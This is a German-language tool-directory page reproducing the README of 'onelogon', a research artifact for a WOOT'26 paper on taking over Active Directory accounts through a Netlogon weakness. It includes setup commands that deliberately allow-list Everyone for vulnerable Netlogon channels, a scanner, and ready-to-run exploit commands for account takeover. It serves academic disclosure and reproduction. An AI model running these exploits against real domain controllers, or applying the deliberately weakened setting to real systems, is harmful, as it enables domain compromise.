Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
onelogon — Code und Daten zu unserem Paper „Onelogon: Taking over Active Directory Accounts via Netlogon“ (WOOT’26). | Kitploit
Tools/GitHubGitHub/rub-softsec/onelogon
SchwachstellenscannerSchwachstellenanalyseExploitationNetzwerksicherheitPenetrationstestsAuthentifizierungPapers & Forschung
GitHubrub-softsec/onelogon

onelogon

Code und Daten zu unserem Paper „Onelogon: Taking over Active Directory Accounts via Netlogon“ (WOOT’26).

Repository anzeigen
118219vor 29 TagenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Onelogon: Übernahme von Active-Directory-Konten über Netlogon

Dieses Repository enthält Code und Daten zu unserem Paper Onelogon: Taking over Active Directory Accounts via Netlogon (WOOT'26).

  1. Kontext
  2. Zitieren
  3. Aufbau und Einrichtung des Artefakts
  4. Einrichten einer Testumgebung
  5. Suche nach verwundbaren Konfigurationen
  6. Exploitation
  7. Reproduktion der Messungen

Kontext

Die in unserem Paper beschriebene Schwachstelle greift eine Schwäche des kryptografischen Patches von 2020 für die Zerologon-Schwachstelle an. Konten, die in einer Gruppenrichtlinie aufgeführt sind, die Unterstützung für Legacy-Setups ermöglichen soll, die keine Netlogon-Signierung und -Versiegelung unterstützen, sind gegenüber diesem Angriff verwundbar. Eine detaillierte Beschreibung der Schwachstelle, der erwarteten vollständigen Angriffskette sowie möglicher Gegenmaßnahmen finden Sie im Paper.

Zitieren

@inproceedings{woot2026-onelogon,
  title     = {{Onelogon: Taking over Active Directory Accounts via Netlogon}},
  author    = {Neff, Alexander and Holl, Tobias and Borgolte, Kevin},
  booktitle = {Proceedings of the 20th USENIX WOOT Conference on Offensive Technologies},
  date      = {2026-08},
  editor    = {Bianchi, Antonio and Classen, Jiska},
  location  = {Baltimore, MD, USA},
  publisher = {USENIX Association}
}

Aufbau und Einrichtung des Artefakts

Das Artefakt besteht aus einem Python-poetry-Projekt für den Scanner und die Exploits.

Um die mit dem Artefakt bereitgestellten Skripte auszuführen, installieren Sie Python (3.12 oder neuer) sowie entweder poetry (Anleitung) oder uv (Anleitung). Der Einfachheit halber geben wir die Befehle in der Annahme an, dass Sie poetry verwenden; falls Sie sich für uv entscheiden, ersetzen Sie einfach jede Erwähnung von poetry durch uv.

Alle Befehle in diesem Dokument sollten im Stammverzeichnis des Artefakts ausgeführt werden (dort, wo sich diese README befindet).

Wenn Sie poetry verwenden, führen Sie poetry install aus, um alle Abhängigkeiten zu installieren.

Einrichten einer Testumgebung

Um die Ergebnisse des Papers zu reproduzieren, können Sie einen Domänencontroller mit einer Version von Windows Server einrichten, in der Zerologon behoben ist (wir haben den Exploit sowohl gegen die 2019er- als auch gegen die 2025er-Version verifiziert).

Um den Domänencontroller auf einer neuen Installation von Windows Server 2025 einzurichten, führen Sie die folgenden Befehle aus:

# System aktualisieren und Computer in "DC" umbenennen
Install-Module -Name PSWindowsUpdate -Force
Install-WindowsUpdate -MicrosoftUpdate -AcceptAll
Rename-Computer -NewName "DC" -Restart

# Domäne einrichten (als "onelogon.local")
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
Install-ADDSForest -DomainName "onelogon.local"

# Ablauf des Administrator-Kennworts deaktivieren, um die VM nutzbar zu halten
Set-ADUser -Identity "Administrator" -PasswordNeverExpires $true

Die Schwachstelle betrifft jedes Konto, das in der DACL des Gruppenrichtlinienobjekts Domain Controller: Allow vulnerable Netlogon secure channel connections oder im entsprechenden Registrierungsschlüssel aufgeführt ist:
HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\VulnerableChannelAllowList

Sie können diese Parameter manuell auf dem Domänencontroller konfigurieren (denken Sie daran, gpupdate /force auszuführen, wenn Sie den GPO-Eintrag ändern), oder den folgenden Befehl ausführen, um alle Konten zur DACL im Registrierungsschlüssel hinzuzufügen:

Set-GPRegistryValue -Name "Default Domain Controllers Policy" `
                    -Key "HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters" `
                    -ValueName "VulnerableChannelAllowList" `
                    -Type String `
                    -Value "O:BAG:BAD:(A;;RC;;;WD)" # Everyone

Suche nach verwundbaren Konfigurationen

Um zu ermitteln, welche Konten ein Domänencontroller in seiner VulnerableChannelAllowList führt, stellen wir einen Scanner bereit, der die Registrierungsstruktur und die GPO-Volumenfreigabe des Domänencontrollers analysiert. Beachten Sie, dass der Zugriff auf die Registrierung für diesen Scan Domänenadministrator-Rechte erfordert (der Exploit selbstverständlich nicht).

# Mit dem angegebenen Benutzernamen und Kennwort den Ziel-DC scannen.
poetry run scan --dc-ip <IP of target DC> --username <username> --password <password>

# Mit `--help` erhalten Sie weitere Verwendungshinweise.
poetry run scan --help

Ein positives Scan-Ergebnis (es gibt verwundbare Konten auf dem Domänencontroller) zeigt den Sicherheitsdeskriptor mit den verwundbaren Konten (in Microsofts Security Descriptor Definition Language):

~$ poetry run scan --dc-ip 192.168.108.244 -u Administrator -p Xb52RLIiL5k2BhMC
[+] Found 1 matching policies in SYSVOL Share.
[+] Found vulnerable channel allow list in policy '{6AC1786C-016F-11D2-945F-00C04fB984F9}':
    'O:BAG:BAD:(A;;RC;;;BA)(A;;RC;;;S-1-5-21-1725695585-1077004420-3792776154-1000)'
[+] Found VulnerableChannelAllowList registry configuration:
    O:BAG:BAD:(A;;RC;;;BA)(A;;RC;;;S-1-5-21-1725695585-1077004420-3792776154-1000)

Ein negatives Ergebnis (der Ziel-DC ist nicht verwundbar) sieht stattdessen wie folgt aus:

~$ poetry run scan --dc-ip 192.168.108.244 -u Administrator -p Xb52RLIiL5k2BhMC
[-] No matching policies found in SYSVOL Share.
[-] Error while querying registry: RRP SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND
    - The system cannot find the file specified.

Exploitation

Um den Proof-of-Concept-Exploit gegen einen Ziel-Domänencontroller auszuführen, wählen Sie zunächst ein verwundbares Konto aus. Sie benötigen die IP-Adresse des Domänencontrollers, seinen Hostnamen und den Namen des verwundbaren Kontos.

In unserer Beispielkonfiguration heißt der verwundbare Domänencontroller DC. Sein Computerkonto (DC$) ist in der GPO-Richtlinie enthalten und daher gegenüber Onelogon verwundbar.

# Den Meet-in-the-Middle-Angriff ausführen (Abschnitt 4.5 des Papers)
poetry run onelogon --dc-ip <IP of target DC> --dc-name <Name of target DC> \
                    --username <Target account name>

# Die 24-Bit-Brute-Force mit einem Computerkonto ausführen (Abschnitt 4.4 des Papers)
poetry run onelogon --dc-ip <IP of target DC> --dc-name <Name of target DC> \
                    --username <Target account name> \
                    --comp-username <Computer account> --comp-pass <Computer account password>

# Die (langsame) 32-Bit-Brute-Force mit einem Computerkonto ausführen
poetry run onelogon --naive --dc-ip <IP of target DC> --dc-name <Name of target DC> \
                    --username <Target account name> \
                    --comp-username <Computer account> --comp-pass <Computer account password>

# Die (sehr langsame) 32-Bit-Brute-Force ohne Computerkonto ausführen
poetry run onelogon --naive --dc-ip <IP of target DC> --dc-name <Name of target DC> \
                    --username <Target account name>
Ausgabe eines erfolgreichen Exploits

Zur Veranschaulichung zeigen wir die Ausgabe eines erfolgreichen Laufs des Meet-in-the-Middle-Angriffs gegen eine Testumgebung:

Tool herunterladen